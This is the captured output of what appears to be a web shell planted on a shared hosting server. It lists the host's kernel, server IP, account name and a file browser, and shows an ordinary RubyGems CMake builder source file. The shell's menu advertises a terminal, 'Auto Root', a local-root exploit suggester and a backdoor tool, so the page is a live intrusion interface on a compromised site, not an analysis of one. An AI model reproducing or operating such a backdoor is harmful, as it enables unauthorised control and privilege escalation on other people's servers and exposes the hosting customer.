Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.248 & Your IP : 216.73.216.104
Domains :
Cant Read [ /etc/named.conf ]
User : tailxcij
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
rubygems /
rubygems /
ext /
Delete
Unzip
Name
Size
Permission
Date
Action
cargo_builder
[ DIR ]
drwxr-xr-x
2026-02-10 10:04
build_error.rb
179
B
-rw-r--r--
2026-01-27 16:00
builder.rb
7.24
KB
-rw-r--r--
2026-01-27 16:00
cargo_builder.rb
10.08
KB
-rw-r--r--
2026-01-27 16:00
cmake_builder.rb
667
B
-rw-r--r--
2026-01-27 16:00
configure_builder.rb
772
B
-rw-r--r--
2026-01-27 16:00
ext_conf_builder.rb
2.55
KB
-rw-r--r--
2026-01-27 16:00
rake_builder.rb
1.01
KB
-rw-r--r--
2026-01-27 16:00
Save
Rename
# frozen_string_literal: true class Gem::Ext::CmakeBuilder < Gem::Ext::Builder def self.build(extension, dest_path, results, args=[], lib_dir=nil, cmake_dir=Dir.pwd, target_rbconfig=Gem.target_rbconfig) if target_rbconfig.path warn "--target-rbconfig is not yet supported for CMake extensions. Ignoring" end unless File.exist?(File.join(cmake_dir, "Makefile")) require_relative "../command" cmd = ["cmake", ".", "-DCMAKE_INSTALL_PREFIX=#{dest_path}", *Gem::Command.build_args] run cmd, results, class_name, cmake_dir end make dest_path, results, cmake_dir, target_rbconfig: target_rbconfig results end end